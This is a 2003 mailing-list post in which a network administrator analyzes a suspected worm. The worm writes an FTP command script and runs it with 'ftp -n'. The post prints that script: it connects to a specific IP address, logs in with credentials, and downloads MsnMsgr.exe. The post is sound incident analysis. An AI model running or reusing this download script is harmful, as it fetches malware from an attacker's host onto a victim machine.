Security Incidents mailing list archives

FW: New Worm or Worm Variant?

From: "Bassett, Mark" <mbassett () omaha com>
Date: Thu, 11 Dec 2003 12:22:02 -0600

Looks to me like its building the wxtu.dll after it initializes
connection.

And then it uses that built file as a command input to ftp.
So its doing ftp -n

With input from wxtu.dll which is below

open 211.26.130.118
USER noxe
Noxe
Binary
Get MsnMsgr.exe
bye

so it is just a simple ftp script to download an exploit.

Mark Bassett
Network Administrator
World media company
Omaha.com